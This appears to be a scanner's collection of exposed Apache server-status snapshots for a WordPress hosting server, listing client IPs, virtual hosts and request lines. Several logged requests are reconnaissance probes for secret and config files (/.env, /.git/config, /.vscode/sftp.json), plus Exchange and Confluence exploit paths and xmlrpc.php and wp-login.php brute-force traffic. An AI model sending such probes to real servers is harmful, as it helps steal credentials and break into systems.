Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 13-Sep-2023 22:08:39 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 6 days 10 hours 18 minutes 35 seconds Server load: 0.14 0.14 0.10 Total accesses: 374319 - Total Traffic: 8.1 GB - Total Duration: 50258569 CPU Usage: u132.47 s208.55 cu1020.36 cs691.03 - .369% CPU load .674 requests/sec - 15.3 kB/second - 22.7 kB/request - 134.267 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0247391no1yes010000 1247553no3yes010200 2247392no0yes19000 3247584no0yes010000 4247393no0yes010000 Sum504 149200 _____________________W____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-182473910/257/4002_ 32.66004364940.07.0982.85 64.227.126.135http/1.1 0-182473910/351/3652_ 31.018104957260.016.1690.05 190.161.206.77h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-182473910/189/3883_ 32.6619905415400.08.4792.52 45.90.62.155http/1.1lcftech.es:443GET /wp-content/uploads/2021/05/cropped-cropped-logo-LCF-blue_1 0-182473910/255/3873_ 32.6619904678110.04.1174.31 45.90.62.155http/1.1lcftech.es:443GET /wp-content/uploads/2021/05/cropped-cropped-logo-LCF-blue_1 0-182473910/204/3786_ 32.66005983910.07.1275.97 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-182473910/324/3667_ 32.381943875848480.04.1383.16 34.216.124.117h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-182473910/280/3742_ 32.3819406289720.08.6477.72 206.189.57.162http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.0 0-182473910/300/3680_ 31.02212485588200.05.3356.70 190.151.21.42h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-182473910/327/4106_ 32.6611286778640.011.27100.89 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-182473910/198/3635_ 31.67184115048450.07.0462.70 186.95.62.235h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-182475530/1224/8564_ 64.580110330170.030.49207.99 186.167.203.106h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-182475530/1121/8773_ 64.64008540880.028.40187.28 66.249.64.5http/1.1 1-182475530/1130/8534_ 64.760011588780.021.81193.21 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-182475530/921/8748_ 64.67146111879960.038.25176.80 66.249.70.164http/1.1tandemsl.com:443GET /en/hse-engineering/containment-of-contaminated-water/ HTTP 1-182475530/1009/8300_ 64.76009405930.045.71196.39 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-182475530/1157/9169_ 64.63009076470.027.09167.49 64.227.126.135http/1.1 1-182475530/1089/8960_ 64.76009816890.023.93177.73 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-182475530/989/8881_ 64.66183299228970.021.46213.49 66.249.70.164http/1.1tandemsl.com:443GET /en HTTP/1.1 1-182475530/1321/8777_ 64.760012084020.037.80198.46 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-182475530/1206/9371_ 64.751213442460.037.59216.66 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-182473920/817/4027_ 76.0141005719350.017.1979.18 186.95.62.235h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-182473920/843/4160W 75.47005226190.024.2596.21 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-182473920/845/4499_ 76.04725246165430.015.1280.19 5.78.48.146h2tandemsl.com:443idle, streams: 0/1/0/0/1 (open/recv/resp/push/rst) 2-182473920/774/4574_ 75.47019841720.021.30100.37 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-182473920/854/4380_ 75.91723906223790.019.77110.90 206.189.57.162http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-182473920/806/4129_ 76.04229156848230.022.9878.17 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694635189.51369810104370117187 2-182473920/725/3983_ 75.45229113382050.023.0688.43 88.12.106.118h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-182473920/862/4061_ 76.19229138239320.012.9767.13 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694635489.83648490905761718750 2-182473920/883/4086_ 75.4441006301110.016.3995.78 46.222.86.162h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-182473920/838/4088_ 76.267723212698370.019.7980.29 17.241.75.71http/1.1tandemsl.com:443GET /ingenieria-hse/apq/mie-apq-0-definiciones-generales/consul 3-182475840/1011/6303_ 63.49008023760.025.44160.12 148.245.33.10h2tandemsl.com:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 3-182475840/1179/6351_ 63.255206932550.020.05110.19 187.189.248.215h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-182475840/1344/6671_ 63.351624813432900.033.97178.38 190.161.206.77h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-182475840/1267/7168_ 63.50007801990.021.58159.73 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-182475840/1173/6378_ 63.420368526840.033.85188.28 64.227.126.135http/1.1 3-182475840/1081/6694_ 63.400010871280.021.26149.99 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-182475840/1081/5930_ 63.500014857500.013.38133.08 148.245.33.10h2tandemsl.com:443idle, streams: 0/25/25/0/0 (open/recv/resp/push/rst) 3-182475840/1021/6155_ 63.49039886560.027.28150.76 148.245.33.10h2tandemsl.com:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 3-182475840/1090/6328_ 63.25007680700.029.96130.39 64.227.126.135http/1.1 3-182475840/1424/6796_ 63.47128086260.030.23144.00 148.245.33.10h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-182473930/1180/13738_ 63.8278015949400.022.13309.16 190.161.206.77h2tandemsl.com:443idle, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 4-182473930/1063/14686_ 63.8279017426300.012.83257.63 190.161.206.77h2tandemsl.com:443idle, streams: 0/52/52/0/0 (open/recv/resp/push/rst) 4-182473930/1041/13844_ 63.780016171290.027.45358.92 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-182473930/985/14326_ 63.8279016279930.035.34373.70 190.161.206.77h2tandemsl.com:443idle, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 4-182473930/1027/14265_ 63.7773017721730.035.01288.67 190.161.206.77h2tandemsl.com:443done, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 4-182473930/1086/13710_ 63.7872017264370.039.65381.95 190.161.206.77h2tandemsl.com:443idle, streams: 0/28/28/0/0 (open/recv/resp/push/rst) 4-182473930/1175/14834_ 63.8100</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e391c579ec
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 13-Sep-2023 00:38:37 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 5 days 12 hours 48 minutes 33 seconds Server load: 0.05 0.07 0.02 Total accesses: 306623 - Total Traffic: 6.7 GB - Total Duration: 34112149 CPU Usage: u52.52 s48.74 cu909.98 cs617.88 - .341% CPU load .641 requests/sec - 14.6 kB/second - 22.8 kB/request - 111.251 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0221954no2yes010100 1221957no0yes010000 2221955no0yes19000 3221956no0yes010000 4222086no0yes010000 Sum502 149100 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-172219540/653/2684_ 20.3912052608900.011.6356.88 190.237.33.176h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172219540/635/2540_ 20.57003374490.013.9057.27 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-172219540/563/2827_ 20.56013715490.010.2972.08 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1694558304.10062789916992187500 0-172219540/545/2692_ 20.56111683147720.08.9559.87 193.41.226.117http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 0-172219540/545/2492_ 20.541103959170.012.7249.16 190.237.33.176h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-172219540/432/2382_ 20.56003280190.010.0267.03 161.35.27.144http/1.1 0-172219540/464/2442_ 20.55004298250.011.7453.33 161.35.27.144http/1.1 0-172219540/500/2398_ 20.56003725100.09.7840.30 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-172219540/671/2804_ 20.57004303760.013.3075.08 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-172219540/579/2373_ 20.56113263190.07.7237.66 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-172219570/449/6481_ 18.40132456611910.06.67166.59 193.41.226.117http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 1-172219570/531/6899_ 18.1408405879570.011.99140.98 161.35.27.144http/1.1 1-172219570/556/6667_ 18.360376457840.011.05156.05 161.35.27.144http/1.1 1-172219570/327/6909_ 18.121206687100.04.80127.22 70.45.224.138h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 1-172219570/445/6353_ 18.3702656943670.08.36131.23 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-172219570/439/7111_ 18.41121596374730.05.74124.84 193.41.226.117http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 1-172219570/427/7022_ 18.02107165820.011.93142.37 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-172219570/472/7067_ 18.28133566774250.010.79171.09 72.29.76.121http/1.1 1-172219570/393/6682_ 18.42006177400.06.97146.88 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-172219570/401/7165_ 18.090011007980.08.71163.67 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/29/3142_ 9.7538204226230.00.2361.31 201.105.165.203http/1.1tandemsl.com:443GET /wp-content/uploads/2019/05/6.png HTTP/1.1 2-172219550/50/3062_ 9.7230503481790.00.7868.47 54.183.77.92http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /favicon.ico HTTP/1.1 2-172219550/67/3488_ 9.5116803648860.00.7761.47 189.206.133.242h2tandemsl.com:443idle, streams: 0/52/52/0/0 (open/recv/resp/push/rst) 2-172219550/36/3668_ 9.5241904557720.00.2075.80 189.206.133.242h2tandemsl.com:443idle, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 2-172219550/51/3388_ 9.7830514407430.00.8187.47 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694558011.84090495109558105468 2-172219550/75/3184W 9.59005249980.01.3152.94 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-172219550/89/3088_ 9.4837704327660.01.2364.02 181.117.228.60h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/42/2921_ 9.514192563385350.01.3052.07 189.206.133.242h2tandemsl.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-172219550/37/3088_ 9.831683304456180.00.5974.82 132.145.30.114http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 2-172219550/57/3078_ 9.4837704378850.00.7756.33 201.158.0.250h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-172219560/127/4987_ 9.861116045650.04.11131.13 177.240.27.230h2tandemsl.com:443idle, streams: 0/42/42/0/0 (open/recv/resp/push/rst) 3-172219560/86/4968_ 10.29004635390.01.0587.15 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-172219560/72/5146_ 9.96026429640.00.72142.14 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-172219560/104/5601_ 10.22005726940.01.91135.17 132.145.30.114http/1.1lcftech.es:80POST /xmlrpc.php HTTP/1.1 3-172219560/85/4949_ 9.83005361260.01.12151.77 161.35.27.144http/1.1 3-172219560/99/5402_ 10.29016440230.01.28126.63 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-172219560/149/4572_ 9.93006397120.05.05117.36 190.2.143.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-172219560/108/4956_ 9.87106379880.04.82121.36 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-172219560/117/5020_ 9.891692985711780.01.6298.29 190.2.143.136http/1.1 3-172219560/100/5144_ 10.27111465044900.01.23108.68 193.41.226.117http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 4-172220860/95/12470_ 9.536801413754370.02.10286.04 17.246.15.28http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/swiper/swiper.min. 4-172220860/94/13470_ 9.57969012694930.01.75243.59 190.2.143.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-172220860/86/12680_ 9.54680713945840.01.18328.69 17.246.15.28http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-172220860/75/13273_ 9.52966113876110.00.91337.84 189.206.133.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-172220860/66/13130_ 9.52969212141630.00.78252.38 190.2.143.136http/1.1 4-172220860/61/12548_ 8.471044013472230.00.90338.38 54.218.191.103http/1.1 4-172220860/66/13536_ 9.53680113111670.01.39318.87 17.246.15.28http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min. 4-172220860/37/13179_ 9.52721114467200.00.62281.26 187.188.227.130h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e318d70e53
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 10-Sep-2023 18:01:01 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 9 Parent Server MPM Generation: 8 Server uptime: 3 days 6 hours 10 minutes 57 seconds Server load: 0.07 0.05 0.05 Total accesses: 163376 - Total Traffic: 3.3 GB - Total Duration: 14743996 CPU Usage: u75.17 s73.38 cu445.84 cs303.32 - .319% CPU load .58 requests/sec - 12.3 kB/second - 21.2 kB/request - 90.2458 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0113540no0yes19000 1113543no0yes010000 2113541no0yes010000 3113542no0yes010000 4113707no1yes010010 Sum501 149010 _______W__________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-81135400/504/1348_ 33.48001020320.07.0327.51 134.0.10.229http/1.1barrerasdecontencion.com:80GET /wp-cron.php HTTP/1.1 0-81135400/509/1288_ 33.2852351136980.07.9723.70 66.249.70.164http/1.1 0-81135400/727/1531_ 33.37011195350.021.7036.47 134.0.10.229http/1.1 0-81135400/674/1410_ 33.2445681021370.013.9828.09 172.105.37.32http/1.1 0-81135400/558/1369_ 33.1141978810.015.9826.66 172.105.37.32http/1.1 0-81135400/570/1212_ 33.46521110240.013.5034.68 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694361655.75383305549621582031 0-81135400/537/1201_ 33.415511175140.021.2030.46 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-81135400/520/1166W 33.46001041010.05.8417.11 172.105.37.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-81135400/550/1351_ 33.48001017820.022.5641.80 172.105.37.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-81135400/543/1187_ 33.4146421085890.08.4320.12 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-81135430/176/5539_ 22.669111354928920.01.97150.23 185.220.100.253http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 1-81135430/197/5598_ 22.96204685800.01.75110.57 172.105.37.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-81135430/254/5544_ 22.4442395050960.02.30126.40 172.105.37.32http/1.1 1-81135430/190/5957_ 22.5535155160510.04.52110.22 172.105.37.32http/1.1 1-81135430/191/5238_ 22.4615505102980.03.60108.58 72.9.153.49http/1.1 1-81135430/198/5968_ 22.4617004930820.02.11108.03 166.198.157.134h2tandemsl.com:443idle, streams: 0/62/62/0/0 (open/recv/resp/push/rst) 1-81135430/152/5965_ 22.45305372850.02.00113.57 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-81135430/208/6009_ 22.89170395405850.01.86152.10 128.14.74.121http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-81135430/259/5787_ 22.4591104687660.03.02125.96 166.198.157.134h2tandemsl.com:443idle, streams: 0/60/60/0/0 (open/recv/resp/push/rst) 1-81135430/228/6125_ 22.46508134890.02.30140.45 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-81135410/77/1246_ 18.8314280926680.01.0415.98 136.226.0.123http/1.1tandemsl.com:443GET /wp-content/themes/metro-pro/images/favicon.ico HTTP/1.1 2-81135410/72/1194_ 18.8314280824610.00.5814.65 136.226.0.123http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-81135410/60/1225_ 19.6610974880.00.5116.83 172.105.37.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-81135410/84/1396_ 18.831720914620.00.5025.79 165.232.76.155http/1.1 2-81135410/54/1353_ 18.8317201108530.00.3727.29 165.232.76.155http/1.1 2-81135410/65/1055_ 19.6017241963710.01.1415.42 45.76.133.18http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-81135410/101/1153_ 19.2214251921253800.010.6423.98 54.71.203.174h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-81135410/66/1012_ 18.831820849830.00.4520.41 136.226.0.123http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/waypoints/waypoint 2-81135410/95/1132_ 19.6018244920130.00.6117.22 217.61.36.230http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-81135410/60/1105_ 18.8214251805000.00.5317.83 136.226.0.123http/1.1tandemsl.com:443GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 H 3-81135420/72/1174_ 19.5590218943800.00.3619.17 42.193.241.216http/1.1tandemsl.com:443GET /public/lib/webuploader/0.1.5/server/preview.php HTTP/1.1 3-81135420/72/953_ 18.973303978420.00.4114.49 172.105.37.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-81135420/90/1024_ 18.74111801361750.00.5824.29 136.226.0.123http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.run 3-81135420/87/1139_ 18.959953511340890.01.2424.78 201.123.16.104h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-81135420/84/976_ 17.71900845760.01.2516.67 42.193.241.216http/1.1 3-81135420/78/936_ 18.74119601083580.00.5116.60 181.188.179.141h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-81135420/81/903_ 19.59021051060.00.4813.31 134.0.10.229http/1.1barrerasdecontencion.com:443GET /wp-cron.php HTTP/1.1 3-81135420/79/1149_ 19.1602961990.00.6420.00 134.0.10.229http/1.1 3-81135420/75/1007_ 18.941369146823410.00.5713.96 165.232.76.155http/1.1tandemsl.com:443GET /.git/config HTTP/1.1 3-81135420/82/1145_ 18.941136195953100.01.1714.43 165.232.76.155http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-81137070/571/6774_ 33.9954786864120.08.94154.92 66.249.70.163http/1.1tandemsl.com:443GET /seguridad-industrial-blog/entornos-atex-en-la-carga-de-bat 4-81137070/795/7446_ 33.8112115936630.017.39129.06 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694361139.61126589775085449218 4-81137070/625/6756_ 34.00105987300.027.96148.70 172.105.37.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-81137070/538/7239_ 34.00226553860.012.55173.17 172.105.37.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-81137070/591/7272_ 33.6633275836320.08.04119.27 172.105.37.32http/1.1 4-81137070/573/7062_ 33.950496515560.010.96172.53 213.175.66.138http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 4-81137070/587/7208_ 33.811346657100.08.84178.52 51.178.207.154h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-81137070/603/6993_ 33.69226386790.09.18132.99 128.14.74.121http/1.1 4-81137070/557/6547
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e37e7fddef
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 09-Sep-2023 02:25:00 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 8 Parent Server MPM Generation: 7 Server uptime: 1 day 14 hours 34 minutes 57 seconds Server load: 0.04 0.08 0.02 Total accesses: 119501 - Total Traffic: 2.5 GB - Total Duration: 9118554 CPU Usage: u3.89 s6.07 cu323.11 cs196.01 - .381% CPU load .86 requests/sec - 18.8 kB/second - 21.8 kB/request - 76.3053 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 069301no0yes19000 169304no0yes010000 269302no0yes010000 369303no0yes010000 469434no0yes19000 Sum500 248000 __R________________________________________W______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7693010/2/699_ 0.04015400800.00.0119.13 139.59.230.191http/1.1relehse.com:443GET /_all_dbs HTTP/1.1 0-7693010/2/627_ 0.0500415710.00.0114.05 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 0-7693010/2/647R 0.03017451130.00.0111.46 139.59.65.144http/1.1relehse.com:443 0-7693010/1/599_ 0.0300383450.00.0012.57 146.190.98.165http/1.1relehse.com:80GET /.DS_Store HTTP/1.1 0-7693010/3/626_ 0.0500317110.00.018.89 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-7693010/1/518_ 0.0500568170.00.0019.88 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-7693010/4/513_ 0.0500352940.00.008.06 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 0-7693010/1/541_ 0.0200458400.00.0010.58 139.59.65.144http/1.1 0-7693010/3/664_ 0.05016403340.00.0118.02 139.59.230.191http/1.1relehse.com:443GET /.env HTTP/1.1 0-7693010/3/526_ 0.0500408210.00.0010.45 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-7693040/2/4434_ 0.020223289900.00.01118.47 139.59.65.144http/1.1relehse.com:443GET / HTTP/1.1 1-7693040/1/4418_ 0.03103291990.00.0085.34 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-7693040/1/4430_ 0.01003203110.00.00110.31 45.55.193.222http/1.1relehse.com:80GET /.vscode/sftp.json HTTP/1.1 1-7693040/2/4957_ 0.030193778150.00.0290.52 139.59.230.191http/1.1relehse.com:443GET /.DS_Store HTTP/1.1 1-7693040/1/4196_ 0.01003671450.00.0079.90 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7693040/3/4841_ 0.03003437660.00.0188.05 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-7693040/0/5043_ 0.0007913960620.00.0098.99 144.126.206.47http/1.1 1-7693040/3/4937_ 0.03004212380.00.00129.91 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-7693040/1/4660_ 0.03003283640.00.00105.92 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-7693040/1/5088_ 0.03006767050.00.00125.35 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-7693020/2/968_ 0.0210508340.00.0013.12 146.190.98.165http/1.1relehse.com:80GET /server-status HTTP/1.1 2-7693020/2/959_ 0.0410557930.00.0012.84 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-7693020/2/976_ 0.0400634540.00.0114.63 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-7693020/3/1146_ 0.0400537270.00.0123.73 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 2-7693020/0/1099_ 0.0010581740.00.0022.25 139.59.230.191http/1.1 2-7693020/2/833_ 0.0410592000.00.0113.31 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-7693020/3/852_ 0.02114689860.00.0111.88 139.59.65.144http/1.1relehse.com:443GET /v2/_catalog HTTP/1.1 2-7693020/1/724_ 0.02018461910.00.0117.70 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7693020/2/826_ 0.0200539990.00.0014.85 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7693020/1/870_ 0.03221553400.00.0116.24 139.59.230.191http/1.1relehse.com:443GET /server-status HTTP/1.1 3-7693030/2/742_ 0.0800359230.00.0212.14 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-7693030/4/522_ 0.0800412510.00.025.85 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-7693030/3/509_ 0.0800422040.00.017.59 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-7693030/2/611_ 0.050438425610.00.0312.97 